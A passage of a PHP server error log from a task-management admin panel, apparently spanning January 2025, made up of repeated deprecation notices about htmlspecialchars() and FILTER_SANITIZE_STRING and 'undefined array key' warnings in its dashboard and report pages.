/home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 10:09:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 10:09:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 12:02:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 12:03:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 12:03:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:33:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 14:34:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:34:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:43:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 14:43:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:43:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:52:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:52:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:55:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:55:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 16:06:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 16:06:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 16:06:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 17:09:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 17:09:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 17:09:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 10:19:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 10:20:45 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 10:20:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 10:21:07 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 10:21:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 11:09:13 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 11:58:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 11:58:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 11:58:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 14:31:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 14:31:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 14:31:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 16:30:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 16:41:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 16:41:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 17:14:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 17:14:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 17:14:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 17:30:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 17:30:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 11:56:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 11:57:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 11:57:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 14:18:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 14:18:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 14:18:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 16:34:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 16:40:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:40:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:40:45 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:41:54 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:41:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:42:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 16:42:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 16:50:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 16:50:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 16:50:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 17:42:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 17:42:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 17:42:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 17:55:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Jan-2025 17:55:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Jan-2025 18:11:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 18:17:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 18:17:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 18:17:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 11:33:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 11:33:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 11:33:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 11:41:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 11:41:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 11:41:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 11:56:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 11:56:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 12:21:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 12:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 12:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 14:30:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 14:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 14:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 15:47:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 15:47:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 15:47:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 17:50:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 17:50:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 17:50:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 18:08:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 18:08:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 18:08:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 08:12:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 08:12:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 08:12:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 08:26:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 08:26:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 08:26:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 11:57:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 11:57:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 11:57:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 14:30:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 14:30:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 14:30:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 16:30:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 16:31:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 16:31:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 16:36:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 16:36:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 16:36:37 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Jan-2025 17:22:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Jan-2025 17:22:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Jan-2025 17:22:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 11:14:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 11:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 11:15:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 11:49:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 11:49:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 11:49:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 14:30:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 14:30:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [14-Jan-2025 16:31:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [14-Jan-2025 16:32:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [14-Jan-2025 16:32:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 11:53:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 11:53:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 11:53:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 12:51:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 12:51:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 12:51:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 14:30:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 14:30:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 14:30:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 15:46:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Jan-2025 15:47:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 15:47:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 16:09:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [15-Jan-2025 16:09:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [15-Jan-2025 16:58:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 09:18:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 09:18:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 09:18:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 10:02:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 10:13:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 10:13:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 10:13:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 10:22:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Jan-2025 10:22:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Jan-2025 12:00:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Jan-2025 12:01:01 Australia/Sydney] PHP 